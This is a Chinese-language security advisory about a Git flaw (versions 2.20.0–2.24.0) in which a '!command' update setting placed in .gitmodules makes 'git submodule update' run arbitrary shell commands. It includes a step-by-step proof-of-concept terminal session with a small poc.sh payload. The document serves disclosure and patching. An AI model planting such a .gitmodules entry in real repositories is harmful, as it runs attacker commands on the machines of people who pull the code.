git submodule update操作可能導致執行.gitmodules文件中定義的任意shell命令。
受影響的產品
- Git版本2.20.0至2.24.0
修復版本
- Git v2.24.1,v2.23.1,v2.22.2,v2.21.1,v2.20.2
披露時間表
- 2019-11-11 git-security郵件列表的初步報告
- 2019-12-10 Git v2.24.1,v2.23.1,v2.22.2,v2.21.1,v2.20.2發布
CVE編號
細節
git-submodule 的手冊頁指出了子模塊的以下配置選項:
以下更新過程僅通過submodule..update配置變量可用:
自定義命令使用單個參數(超級項目中記錄的提交的sha1)的任意shell命令將被執行。當submodule..update設置為!command時,感嘆號后的其余部分為自定義命令。
可以.gitmodules在Git存儲庫中的文件中定義此配置值。但是,--init使用該標志時,該設置將被覆蓋。
該方法init_submodule中builtin/submodule--helper.c注意到了這一問題:
if (git_config_get_string(sb.buf, &upd) && sub->update_strategy.type != SM_UPDATE_UNSPECIFIED) { if (sub->update_strategy.type == SM_UPDATE_COMMAND) { fprintf(stderr, _("warning: command update mode suggested for submodule '%s'\n"), sub->name); upd = xstrdup("none"); } else上面的代碼將更新策略設置為none內.git/config包含子模塊的存儲庫。
僅當在--init沒有submodule.<name>.update策略的情況下調用,git submodule update且隨后update在內調用將策略設置為外部命令的后續調用時,該命令才會在特殊情況下執行.gitmodules。
開發實例
首先,我們准備一個存儲庫:
joern@hostname ~/tmp $ mkdir example joern@hostname ~/tmp $ cd example joern@hostname ~/tmp/example $ git init . Initialized empty Git repository in /home/joern/tmp/example/.git/ joern@hostname ~/tmp/example $ git submodule add https://gitlab.com/joernchen/xxeserve.git Cloning into '/home/joern/tmp/example/xxeserve'... remote: Enumerating objects: 34, done. remote: Counting objects: 100% (34/34), done. remote: Compressing objects: 100% (29/29), done. remote: Total 34 (delta 14), reused 0 (delta 0) Unpacking objects: 100% (34/34), done. joern@hostname ~/tmp/example $ git commit -m "first commit" [master (root-commit) 9ed9add] first commit 2 files changed, 4 insertions(+) create mode 100644 .gitmodules create mode 160000 xxeserve到目前為止,關於存儲庫沒有什么特別的:
joern@hostname ~/tmp/example $ cat .gitmodules [submodule "xxeserve"] path = xxeserve url = https://gitlab.com/joernchen/xxeserve.git接下來,克隆存儲庫:
joern@hostname ~/tmp $ git clone --recurse-submodules example test Cloning into 'test'... done. Submodule 'xxeserve' (https://gitlab.com/joernchen/xxeserve.git) registered for path 'xxeserve' Cloning into '/home/joern/tmp/test/xxeserve'... remote: Enumerating objects: 34, done. remote: Counting objects: 100% (34/34), done. remote: Compressing objects: 100% (29/29), done. remote: Total 34 (delta 14), reused 0 (delta 0) Submodule path 'xxeserve': checked out 'c4a859fb16e2c65a1708d1c0a404f339191fd8e9'回到原始存儲庫,我們更改子模塊並在中引入命令.gitmodules:
joern@hostname ~/tmp/example $ echo -e '#!/bin/bash\x0aid>/tmp/poc.txt' > poc.sh joern@hostname ~/tmp/example $ echo ' update = !../poc.sh' >> .gitmodules joern@hostname ~/tmp/example $ chmod +x poc.sh joern@hostname ~/tmp/example $ cd xxeserve joern@hostname ~/tmp/example/xxeserve $ git checkout 0f5c204 Previous HEAD position was c4a859f Merge pull request #4 from mccabe615/master HEAD is now at 0f5c204 Update README.md joern@hostname ~/tmp/example/xxeserve $ cd .. joern@hostname ~/tmp/example $ git add . joern@hostname ~/tmp/example $ git commit -m 'second commit' [master ec3abce] second commit 3 files changed, 4 insertions(+), 1 deletion(-) create mode 100755 poc.sh在克隆的存儲庫中,命令將在git pull之后運行git submodule update:
joern@hostname ~/tmp/test $ git pull remote: Enumerating objects: 6, done. remote: Counting objects: 100% (6/6), done. remote: Compressing objects: 100% (3/3), done. remote: Total 4 (delta 1), reused 0 (delta 0) Unpacking objects: 100% (4/4), done. From /home/joern/tmp/example + 113237f...ec3abce master -> origin/master (forced update) Updating 9ed9add..ec3abce Fast-forward .gitmodules | 1 + poc.sh | 2 ++ xxeserve | 2 +- 3 files changed, 4 insertions(+), 1 deletion(-) create mode 100755 poc.sh joern@hostname ~/tmp/test $ git submodule update Submodule path 'xxeserve': '../poc.sh 0f5c2043db22ff091b800cb6c61e015492ad0885' joern@hostname ~/tmp/test $ cat /tmp/poc.txt uid=1000(joern) gid=1000(joern) groups=1000(joern),3(sys),90(network),98(power),991(lp),998(wheel) 外部參考
- Git發布公告
- https://about.gitlab.com/blog/2019/12/10/critical-security-release-gitlab-12-5-4-released/
- https://gitlab.com/gitlab-com/gl-security/disclosures/blob/master/003_git_submodule/advisory.md